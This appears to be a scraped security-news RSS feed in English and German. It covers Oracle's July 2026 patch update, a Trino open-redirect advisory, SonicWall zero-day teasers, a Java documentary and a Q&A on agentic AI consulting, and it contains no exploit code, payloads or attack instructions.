<p class="wp-block-paragraph">These included easily exploitable vulnerabilities allowing unauthenticated attackers with network access via HTTP to compromise Oracle Data Integrator, Oracle Access Manager, Oracle HTTP Server, Oracle Platform Security for Java, Oracle WebCenter Content, Service Delivery Platform, or Oracle Weblogic Server Proxy Plug-in,</p>



<p class="wp-block-paragraph">No other products were found to have quite such extreme vulnerabilities, but there were plenty of others scoring almost as badly.</p>



<h2 class="wp-block-heading">Two critical flaws in Oracle Database Server</h2>



<p class="wp-block-paragraph">The most severe flaw Oracle patched in its flagship database product is CVE-2026-61211, a vulnerability in the RDBMS component’s DBMS_CLOUD package with a CVSS score of 9.9.</p>



<p class="wp-block-paragraph">This easily exploitable vulnerability allows a low-privileged attacker having Execute DBMS_CLOUD privilege with network access via Oracle Net to compromise the RDBMS, <a href="https://www.oracle.com/security-alerts/cpujul2026verbose.html">Oracle said in the patch update statement</a>. “While the vulnerability is in RDBMS, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of RDBMS,” it warned.</p>



<p class="wp-block-paragraph">The flaw affects Database Server versions 19.3 through 19.31 and 23.4.0 through 23.26.2.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said the 9.9 score should be read as serious but conditional. Exposure depends on configuration, he said: On customer-managed databases, DBMS_CLOUD is absent until installed, and grants and network access lists determine the radius from there. “Where DBMS_CLOUD is broadly granted and reachable, the emergency is real and the window is seventy-two hours; where it is absent, the accelerated database wave will do.”</p>



<p class="wp-block-paragraph">Vibhum Dubey, a cybersecurity researcher and red teamer, said the flaw stood out to him because it checks several boxes that concern defenders.</p>



<p class="wp-block-paragraph">“Database servers often hold an organization’s most valuable data, so even if exploitation is not publicly observed yet, I don’t think this is the kind of issue you leave until the next routine maintenance window if your environment is exposed,” Dubey said.</p>



<p class="wp-block-paragraph">A second Database Server flaw, CVE-2026-47040, affects Connection Manager in Oracle Net Services, is remotely exploitable without credentials. Oracle’s risk matrix lists six Database Product vulnerabilities in this cycle as reachable over a network with no authentication required, the statement added.</p>



<p class="wp-block-paragraph">CVE-2026-7383, an OpenSSL-related TLS vulnerability, affects two products, Database Server and Autonomous Health Framework, since both bundle the same third-party component. Oracle’s advisory notes the Database Server patch for that CVE also resolves 19 related OpenSSL CVEs bundled into the same fix.</p>



<p class="wp-block-paragraph">Oracle GoldenGate received 27 new patches, nine of which do not require authentication to exploit, including CVE-2026-2332, a flaw in the Big Data and Application Adapters component tied to Eclipse Jetty, the statement added.</p>



<p class="wp-block-paragraph">There were also two critical flaws in Oracle’s TimesTen in-memory database.</p>



<p class="wp-block-paragraph">The remainder of the release spans E-Business Suite, WebLogic Server, PeopleSoft, Siebel, JD Edwards, Communications, Retail Applications, Utilities Applications, MySQL, Solaris and VM VirtualBox.</p>



<h2 class="wp-block-heading">Volume repair</h2>



<p class="wp-block-paragraph">Gogia said the volume itself marks a shift.</p>



<p class="wp-block-paragraph">“At 1,449 patches, against 481 in April 2026 and 309 a year earlier, patch load has outgrown the queue built to hold it,” he said. He recommended a tiered response: “The reachable and the reported inside seventy-two hours, the trusted core inside ten days, the rest by risk before the October release.”</p>



<p class="wp-block-paragraph">He also flagged a specific risk in how organizations might triage E-Business Suite. “Oracle’s advisory concedes that E-Business Suite exposure sits partly in underlying Database and Fusion Middleware versions outside the E-Business Suite matrix. The fastest way to mis-prioritise this release is to patch by product logo instead of trust boundary.”</p>



<h2 class="wp-block-heading">Third Tuesday, quarterly cycle</h2>



<p class="wp-block-paragraph">The July release is the third quarterly Critical Patch Update of 2026, and the first since the <a href="https://www.csoonline.com/article/4179473/oracles-first-monthly-patch-release-fixes-35-flaws-including-11-rated-critical.html">introduction in May</a> of the monthly Critical Security Patch Update program.</p>



<p class="wp-block-paragraph">Gogia said Oracle has effectively layered a second cadence on top of the existing one rather than replacing it.</p>



<p class="wp-block-paragraph">“Quarterly Critical Patch Updates remain and stay cumulative; monthly Critical Security Patch Updates now sit on top,” he said, adding that enterprise adoption of the new rhythm remains low because of “certification obligations, regression exposure and scarce specialist hours.”</p>



<p class="wp-block-paragraph">Dubey made a similar point about organizational readiness: “In large enterprises, patching is rarely a technical problem. It is an operational one. Database administrators, application owners, infrastructure teams, business stakeholders, and change advisory boards all have to align.”</p>



<p class="wp-block-paragraph">Niyati Daftary, principal analyst at Gartner, said the release underscores a broader shift in how patching is approached.</p>



<p class="wp-block-paragraph">“Patching is no longer a race to remediate every vulnerability. It is a discipline of identifying the exposures that matter most and reducing business risk as efficiently as possible,” she said, adding that organizations should prioritize based on exposure, business impact and exploitability, starting with internet-facing assets and mission-critical systems.</p>



<p class="wp-block-paragraph">Daftary pointed to continuous threat exposure management and adversarial exposure validation as increasingly relevant frameworks, since CVSS scores “measure theoretical severity rather than actual enterprise risk.” Patching alone will not be sufficient, Daftary said, and organizations should continue investing in defense in depth, including behavioral threat detection and incident response.</p>



<p class="wp-block-paragraph">Oracle’s next cumulative Critical Patch Update will come on Oct. 20, 2026, with smaller Critical Security Patch Updates on Aug. 18 and Sept. 15.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Oracle Java SE: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Oracle Java SE ausnutzen, um die Vertraulichkeit, Integrität und Verfügbarkeit zu gefährden.]]></description>
<link>https://tsecurity.de/de/3685924/it-security-nachrichten/neu-mittel-oracle-java-se-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685924/it-security-nachrichten/neu-mittel-oracle-java-se-mehrere-schwachstellen/</guid>
<pubDate>Wed, 22 Jul 2026 12:15:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Oracle Java SE ausnutzen, um die Vertraulichkeit, Integrität und Verfügbarkeit zu gefährden.]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracles Juli-Updates beseitigen weit über 1000 Sicherheitslücken]]></title>
<description><![CDATA[Der US-amerikanische Software-Hersteller Oracle hält nur alle drei Monate einen turnusmäßigen Patch Day ab. Oracle spricht dabei von „Critical Patch Updates“ (CPU). Aufgrund des umfangreichen Produktportfolios sowie des relativ langen Update-Turnus fallen dabei regelmäßig mehrere hundert zu besei...]]></description>
<link>https://tsecurity.de/de/3685615/it-nachrichten/oracles-juli-updates-beseitigen-weit-ueber-1000-sicherheitsluecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685615/it-nachrichten/oracles-juli-updates-beseitigen-weit-ueber-1000-sicherheitsluecken/</guid>
<pubDate>Wed, 22 Jul 2026 10:20:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der US-amerikanische Software-Hersteller Oracle hält nur alle drei Monate einen turnusmäßigen Patch Day ab. Oracle spricht dabei von „Critical Patch Updates“ (CPU). Aufgrund des umfangreichen Produktportfolios sowie des relativ langen Update-Turnus fallen dabei regelmäßig mehrere hundert zu beseitigende Lücken an. Im Juli sind, dem Trend bei anderen Herstellern folgend, 1449 Schwachstellen zusammengekommen – das ist die mit großem Abstand höchste Anzahl, seit es CPU-Tage gibt und mehr als im gesamten Jahr 2025.</p>



<p>Wegen der starken Zunahme der durch „KI“-Tools entdeckten Schwachstellen hat Oracle seit dem <a href="https://www.pcwelt.de/article/3120729/oracles-april-updates-beseitigen-fast-500-sicherheitslucken.html" data-type="link" data-id="https://www.oracle.com/security-alerts/cpuapr2026.html" target="_blank" rel="noreferrer noopener">vorherigen CPU-Tag im April</a> zusätzlich monatliche Sicherheits-Updates eingeführt. Die so genannten „Critical Security Patch Updates“ (CSPU) erscheinen weiterhin am dritten Dienstag eines Monats. Bislang ist Java nicht davon betroffen – das wird sich jedoch bereits im August ändern.</p>



<p>Etliche der beseitigten Schwachstellen sind als kritisch einzustufen. Angaben dazu, ob Schwachstellen bereits für Angriffe ausgenutzt werden (0-Day-Lücken), macht Oracle in seinem aktuellen Sicherheitsbericht nicht. Für die Risikobewertung nutzt Oracle den Industriestandard CVSS 3.1 (Common Vulnerability Scoring Standard), dessen höchster Wert 10.0 ist. Auch Microsoft gibt seit einiger Zeit einen CVSS-Score für beseitigte Sicherheitslücken an.</p>



<p><a href="https://www.pcwelt.de/article/3191057/microsofts-monster-patchday-sprengt-alle-rekorde.html" target="_blank" rel="noreferrer noopener">▶Microsofts Monster-Patchday sprengt alle Rekorde</a></p>



<h2 class="wp-block-heading toc">Die dicksten Brocken</h2>



<p>Die meisten Sicherheitslücken hat Oracle beim <a href="https://www.oracle.com/security-alerts/cpujul2026.html" data-type="link" data-id="https://www.oracle.com/security-alerts/cpujul2026.html" target="_blank" rel="noreferrer noopener">CPU-Tag im Juli</a> in seiner bis dahin eher unauffälligen E-Business Suite geschlossen. Von 410 Schwachstellen sind 45 ohne Benutzeranmeldung über das Netzwerk ausnutzbar und eine erreicht den hohen CVSS-Score 9.8. Nicht weit dahinter folgt Fusion Middleware mit 355 Sicherheitslücken, von denen 46 aus der Ferne ausnutzbar sind und zehn den CVSS-Score 10.0 erreichen.</p>



<p>Diesmal erst an dritter Stelle liegt Oracles Produktfamilie für die Telekommunikationsbranche (Communications). Von den 168 geschlossenen Lücken sind 122 ohne Benutzeranmeldung über das Netzwerk ausnutzbar, 12 davon erreichen den CVSS-Score 9.8. In den Fußnoten nennt Oracle über 160 weitere Schwachstellen, die beseitigt, aber nicht mitgerechnet sind. PeopleSoft kommt auf 84 Lücken, von denen 45 ohne Benutzeranmeldung über das Netzwerk ausnutzbar sind und sechs den CVSS-Score 9.9 erreichen.</p>



<p>Beim quelloffenen Datenbank-Server MySQL nennt Oracle 54 behobene Schwachstellen. Hier sind neun Lücken ohne Benutzeranmeldung über das Netzwerk ausnutzbar und eine erreicht den CVSS Score 8.5. Die neuesten verfügbaren MySQL-Versionen (MySQL Community Server) sind 9.7.1 (LTS – Long Term Support) und 8.4.10 (LTS). Der Versionszweig 8.0 hat mit dem CPU-Tag im April das Support-Ende erreicht, die letzte Version ist 8.0.46.</p>



<h2 class="wp-block-heading toc">Java-Updates für sechs Versionen</h2>



<p>In Java SE (Standard Edition) hat Oracle insgesamt 19 Sicherheitslücken geschlossen (CVSS-Höchstwert 7.8), von denen 17 ohne Benutzeranmeldung übers Netzwerk ausnutzbar sind. Anders als bislang üblich hat Oracle den nächsten Update-Termin für Java bereits für den 18. August angekündigt. Ab 2027 soll Java monatliche Sicherheits-Updates erhalten. Den halbjährlichen Turnus für Feature-Updates (neue Hauptversionen) will Oracle hingegen beibehalten.</p>



<p>Das im März freigegebene Java 26 erhält sein zweites Sicherheits-Update, das zehn Lücken stopft. Nach einem dritten Update im August wird Java 26 bereits im September durch Java 27 abgelöst.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Java 25 ist hingegen eine LTS-Version (Long Term Support) und soll bis Sommer 2033 gepflegt werden. Auch Java 21, Java 17 und Java 11 sind LTS-Versionen. Sie werden acht Jahre lang mit Updates versorgt, Java 11 sogar bis 2032. Der neueste Stand sind die Versionen 25.0.4, 21.0.12, 17.0.20 und 11.0.32. Wer Java 21 kommerziell nutzt, benötigt dafür ab Oktober 2026 eine kostenpflichtige Lizenz. Für Java 25 gilt dies ab Oktober 2028. Für private Nutzung sowie für Entwickler bleibt jedoch weiterhin alles kostenlos.</p>



<p>Für Anwender bleibt laut Oracle weiterhin vorwiegend <a href="https://www.pcwelt.de/article/1134876/java-runtime-environment-jre.html" target="_blank" rel="noreferrer noopener" title="Download">Java 8</a> (JRE – Java Runtime Environment) relevant und von Oracle empfohlen. Die neueste Version ist Java 8 Update 501 (8u501). Darin hat Oracle 18 Schwachstellen beseitigt. Unternehmen und Behörden müssen seit April 2019 für die Java-8-Updates zahlen, Privatpersonen und Entwickler nicht.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihre Programme stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Lücken in VirtualBox</h2>



<p>In der quelloffene Virtualisierungslösung <a href="https://www.pcwelt.de/article/1135009/system-software-virtualbox-windows.html" data-type="link" data-id="https://www.pcwelt.de/article/1135009/system-software-virtualbox-windows.html" target="_blank" rel="noreferrer noopener" title="Download">VirtualBox </a>hat Oracle 16 Schwachstellen (max. CVSS 7.8) beseitigt, von denen keine übers Netzwerk ausnutzbar ist. Womöglich lässt es die eine oder andere der Lücken zu, Code aus der VM auf dem Host-System auszuführen. Die neue, abgesicherte VirtualBox-Version ist 7.2.14. Der ältere Versionszweig 7.1 hat mit dem CPU-Tag im April das Ende der Fahnenstange erreicht: Oracle beendet den Support.</p>



<p>Der nächste turnusmäßige Oracle CPU-Tag ist am 20. Oktober 2026. Seit April 2022 sind diese Termine stets am dritten Dienstag im Januar, April, Juli und Oktober. Seit Mai 2026 werden je nach Dringlichkeit auch monatlich Updates bereitgestellt, die eingangs erwähnten CSPU.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hardening MCP Gateways: Mitigating July 28 Security Risks in Java Applications]]></title>
<description><![CDATA[The upcoming release of the July 28 Model Context Protocol (MCP) specification is a massive milestone for AI integration. By shedding the baggage of stateful connections and embracing a streamlined, stateless HTTP paradigm, MCP has finally become enterprise-ready. Developers can…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3684591/it-security-nachrichten/hardening-mcp-gateways-mitigating-july-28-security-risks-in-java-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684591/it-security-nachrichten/hardening-mcp-gateways-mitigating-july-28-security-risks-in-java-applications/</guid>
<pubDate>Tue, 21 Jul 2026 20:10:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The upcoming release of the July 28 Model Context Protocol (MCP) specification is a massive milestone for AI integration. By shedding the baggage of stateful connections and embracing a streamlined, stateless HTTP paradigm, MCP has finally become enterprise-ready. Developers can…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hardening-mcp-gateways-mitigating-july-28-security-risks-in-java-applications/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hardening-mcp-gateways-mitigating-july-28-security-risks-in-java-applications/">Hardening MCP Gateways: Mitigating July 28 Security Risks in Java Applications</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘The Java Story’ comes to YouTube]]></title>
<description><![CDATA[The evolution of Java is the subject of a just-released documentary about the programming language and development platform. “The Java Story: The Official Documentary” tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.



Produced...]]></description>
<link>https://tsecurity.de/de/3684377/ai-nachrichten/the-java-story-comes-to-youtube/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684377/ai-nachrichten/the-java-story-comes-to-youtube/</guid>
<pubDate>Tue, 21 Jul 2026 18:35:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The evolution of <a href="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html" data-type="link" data-id="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html">Java</a> is the subject of a just-released documentary about the programming language and development platform. <a href="https://inside.java/2026/07/18/the-java-documentary/">“The Java Story: The Official Documentary”</a> tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.</p>



<p class="wp-block-paragraph">Produced by <a href="https://www.youtube.com/@cultrepo">CultRepo</a> and sponsored by Oracle, JetBrains, IBM, and Azul, the documentary follows Java from its set-top box and browser-based origins at Sun Microsystems in the 1990s and through its rise to dominate server-side computing in the 2000s, the “dark ages” and resurgence with Java 8 under Oracle in the 2010s, and its continuing modernization and promising role in AI today. “From its humble beginnings as a project code-named ‘Oak’ at Sun Microsystems to becoming a global standard for enterprise software and billions of devices, Java’s journey is one of radical innovation, strategic pivots, and enduring community strength,” said Cult.Repo. </p>



<p class="wp-block-paragraph">The documentary also delves into Sun’s bitter Java licensing dispute with Microsoft, Oracle’s suit of Google over its use of Java APIs Android (Google won), the creation of the <a href="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html" data-type="link" data-id="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html">Java Community Process</a>, Sun’s open-sourcing of Java, and Oracle’s switch to the six-month release cycle. Technical enhancements such as lambda expressions in Java 8, virtual threads in Java 21 (<a href="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html" data-type="link" data-id="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html">Project Loom</a>), and the ongoing refactor to bring value objects to the Java object model (<a href="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html" data-type="link" data-id="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html">Project Valhalla</a>) also get attention. </p>



<p class="wp-block-paragraph">Technical experts and other Java figures interviewed in the documentary include James Gosling, creator of Java; Kim Polese, Java’s first product manager; Carla Schroer, director of Java compatibility at Sun Microsystems; James Duncan Davidson, creator of Apache Tomcat; Mark Reinhold, chief architect of the Java Platform Group at Oracle; Brian Goetz, Java language architect in the Java Platform Group at Oracle; Rod Johnson, creator of Spring; and Gavin King, creator of Hibernate. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16336 | trinodb trino 481 OAuth2/OIDC ExternalUriInfo.java redirect_uri (Issue 29754 / EUVD-2026-46147)]]></title>
<description><![CDATA[A vulnerability was found in trinodb trino 481. It has been rated as problematic. Affected is an unknown function of the file core/trino-main/src/main/java/io/trino/server/ExternalUriInfo.java of the component OAuth2/OIDC. Performing a manipulation of the argument redirect_uri results in open red...]]></description>
<link>https://tsecurity.de/de/3683437/sicherheitsluecken/cve-2026-16336-trinodb-trino-481-oauth2oidc-externaluriinfojava-redirecturi-issue-29754-euvd-2026-46147/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683437/sicherheitsluecken/cve-2026-16336-trinodb-trino-481-oauth2oidc-externaluriinfojava-redirecturi-issue-29754-euvd-2026-46147/</guid>
<pubDate>Tue, 21 Jul 2026 12:56:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/trinodb:trino">trinodb trino 481</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function of the file <em>core/trino-main/src/main/java/io/trino/server/ExternalUriInfo.java</em> of the component <em>OAuth2/OIDC</em>. Performing a manipulation of the argument <em>redirect_uri</em> results in open redirect.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-16336">CVE-2026-16336</a>. It is possible to initiate the attack remotely. There is no exploit available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Exploit SonicWall SMA Zero-Days to Gain Root Access and Deploy ORANGETAIL Webshell]]></title>
<description><![CDATA[An ongoing exploitation of two zero-day vulnerabilities in SonicWall Secure Mobile Access (SMA) devices. These vulnerabilities allowed a threat actor, identified as UTA0533, to gain root-level access, install persistent malware, and deploy the ORANGETAIL Java webshell on vulnerable VPN appliances...]]></description>
<link>https://tsecurity.de/de/3683128/it-security-nachrichten/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access-and-deploy-orangetail-webshell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683128/it-security-nachrichten/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access-and-deploy-orangetail-webshell/</guid>
<pubDate>Tue, 21 Jul 2026 11:09:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An ongoing exploitation of two zero-day vulnerabilities in SonicWall Secure Mobile Access (SMA) devices. These vulnerabilities allowed a threat actor, identified as UTA0533, to gain root-level access, install persistent malware, and deploy the ORANGETAIL Java webshell on vulnerable VPN appliances.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access-and-deploy-orangetail-webshell/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access-and-deploy-orangetail-webshell/">Hackers Exploit SonicWall SMA Zero-Days to Gain Root Access and Deploy ORANGETAIL Webshell</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Exploit SonicWall SMA Zero-Days to Gain Root Access and Deploy ORANGETAIL Webshell]]></title>
<description><![CDATA[An ongoing exploitation of two zero-day vulnerabilities in SonicWall Secure Mobile Access (SMA) devices. These vulnerabilities allowed a threat actor, identified as UTA0533, to gain root-level access, install persistent malware, and deploy the ORANGETAIL Java webshell on vulnerable VPN appliances...]]></description>
<link>https://tsecurity.de/de/3683070/it-security-nachrichten/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access-and-deploy-orangetail-webshell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683070/it-security-nachrichten/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access-and-deploy-orangetail-webshell/</guid>
<pubDate>Tue, 21 Jul 2026 10:54:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An ongoing exploitation of two zero-day vulnerabilities in SonicWall Secure Mobile Access (SMA) devices. These vulnerabilities allowed a threat actor, identified as UTA0533, to gain root-level access, install persistent malware, and deploy the ORANGETAIL Java webshell on vulnerable VPN appliances. The affected SonicWall SMA models include the 1000 series, specifically models 6210, 7210, and 8200. […]</p>
<p>The post <a href="https://gbhackers.com/hackers-exploit-sonicwall-sma-zero-days-to-gain-root-access/">Hackers Exploit SonicWall SMA Zero-Days to Gain Root Access and Deploy ORANGETAIL Webshell</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Why boutique consultancies might be better for AI rollouts than the bigwigs]]></title>
<description><![CDATA[Major AI labs are unleashing forward-deployed engineers (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.



But smaller firms are in the mix now, as well. AI is helping 28Stone Con...]]></description>
<link>https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</guid>
<pubDate>Mon, 20 Jul 2026 13:33:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Major AI labs are <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">unleashing forward-deployed engineers</a> (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.</p>



<p class="wp-block-paragraph">But smaller firms are in the mix now, as well. AI is helping <a href="https://www.28stone.com/" target="_blank" rel="noreferrer noopener">28Stone Consulting</a>, a New York-based, 230-person technology consultancy for capital markets, punch above its weight against larger rivals in the <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html">rush to deliver FDEs</a>.</p>



<p class="wp-block-paragraph">In this Q&amp;A, <a href="https://www.linkedin.com/in/thomas-dolan-4124914" target="_blank" rel="noreferrer noopener">Thomas Dolan</a> and <a href="https://www.linkedin.com/in/frank-erickson-07675a1" target="_blank" rel="noreferrer noopener">Frank Erickson</a>, founders of 28Stone, argue that agentic AI isn’t a one-size-fits-all solution in vertical markets; success takes discipline, deep domain expertise, and human involvement to mitigate risk.</p>



<p class="wp-block-paragraph">Many enterprises continue to struggle with the use of AI agents, which is consultancies are stepping in to get projects off the ground. 28Stone is among those that have published blueprints and methodologies on the development and delivery of agentic AI workflows with humans in the loop.</p>



<p class="wp-block-paragraph"><em>Computerworld</em> spoke with both founding partners about why companies are still stumbling with <a href="https://www.computerworld.com/article/4083589/from-chatbots-to-colleagues-how-agentic-ai-is-redefining-enterprise-automation.html">agentic AI rollouts</a>, and what a disciplined delivery process actually looks like.</p>



<p class="wp-block-paragraph"><strong>After 15 years of delivering software for capital markets firms, is ‘AI-first’ a real distinction or just positioning?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re not shying away from being AI-forward. What needs to shine through is AI done intelligently — not stuff you get by buying some tokens for somebody on the trading desk. We’re an AI-first firm.”</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And it’s temporary. At some point, AI is going to be synonymous with software development.</p>



<p class="wp-block-paragraph">“The whole idea of an AI SDLC (software development lifecycle) versus an SDLC is going to be one and the same, a lot like cloud computing today. To not include AI in your strategy, you’d look like a COBOL vendor.”</p>



<p class="wp-block-paragraph"><strong>What does agentic AI delivery look like?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’ve got several AI initiatives delivering a pure agentic approach. We’ve doubled down on the human expertise wrapper in the SDLC. That doesn’t mean sacrificing any of the benefits of the AI models — quite the opposite.</p>



<p class="wp-block-paragraph">“You don’t achieve anywhere near the same level of value from applying AI without keeping that expertise — industry, functional and technical — throughout the process.”</p>



<p class="wp-block-paragraph"><strong>Where do humans stay in the loop once agents are doing the work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re believers in starting with requirements discovery. Someone who knows the analytical nuances of a good business analyst is critically important; shaping a product owner’s business information through a markup file that can be fed into a BA agent, then treating the output as if it came from a very fast junior BA. Only then is the story complete.</p>



<p class="wp-block-paragraph">“The developer takes that story, transforms it into the most efficient input, then owns the output, because they’re accountable for that code. A developer should own the code on both the input and output side.</p>



<p class="wp-block-paragraph">“Your product owner, who knows the business, that’s great. But expecting them to interact with an agent and output enterprise code is ridiculous. It’s not a great plan.“</p>



<p class="wp-block-paragraph"><strong>Why not just put one do-everything person in charge of AI and agents?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “Every analyst, programmer or software engineer isn’t a great requirements analyst. And a great domain analyst with some technical background won’t know if the agent’s code is garbage, maintainable, performant.</p>



<p class="wp-block-paragraph">“It’s unrealistic to expect one individual to have that breadth across domain, software engineering, testing, deployment. Clients ask all the time, and we push back: ‘Great, if you can find that guy, they’re few and far between.’ To deliver at the enterprise level, you need the human expertise, at depth.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “There’s system speed and latency, important in parts of finance. Then there’s speed of delivery, because other areas evolve quickly and time-to-market is critical.</p>



<p class="wp-block-paragraph">“Our human wrapper may at first pass come across as a little slowed down. Maybe it is. But [Erickson] has a good analogy about one of the dangers of AI: you can end up going really fast in the wrong direction. By the time you look up, you’re way off base and have to backtrack.“</p>



<p class="wp-block-paragraph"><strong>What about AI in your sector do you think is overhyped?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “The hype around the ease of use of AI and the democratization of enterprise software delivery — that ‘anybody could do it now, it’s all being done by machines’ — is another idea that could prove costly in the long run.</p>



<p class="wp-block-paragraph">“This do-it-yourself reaction is dangerous for clients, and for trust in the overall AI benefit, which is real. We compare it to the beginning of offshoring 20, 30 years ago: a golden idea that was going to cure everything. A lot of firms did it thoughtlessly, thinking it’s just labor arbitrage, and it almost inevitably failed. That all-or-nothing mentality missed that offshoring is an amazing way of getting better value for your dollar, but it has to be done thoughtfully, so the delivery process — the thing that ties it all together — stays unsevered.</p>



<p class="wp-block-paragraph">“We’re seeing that now. I’ve heard, ‘We’ll just push a button, the machine’s building the system.’ The machine is not building the system. It might be writing the code, the story, running the tests.</p>



<p class="wp-block-paragraph">The system is built by a team of engineers you bring in and trust. My fear is that people will say, ‘We don’t need this vendor or this technology team. I’ve got a product team. They might not be able to code at all, but they know the business,’ and it fails dramatically. </p>



<p class="wp-block-paragraph">“Then people say, ‘We played with AI, it’s not ready yet,’ and throw it all away. One of the best things we can do is ensure clients know the benefit is real.“</p>



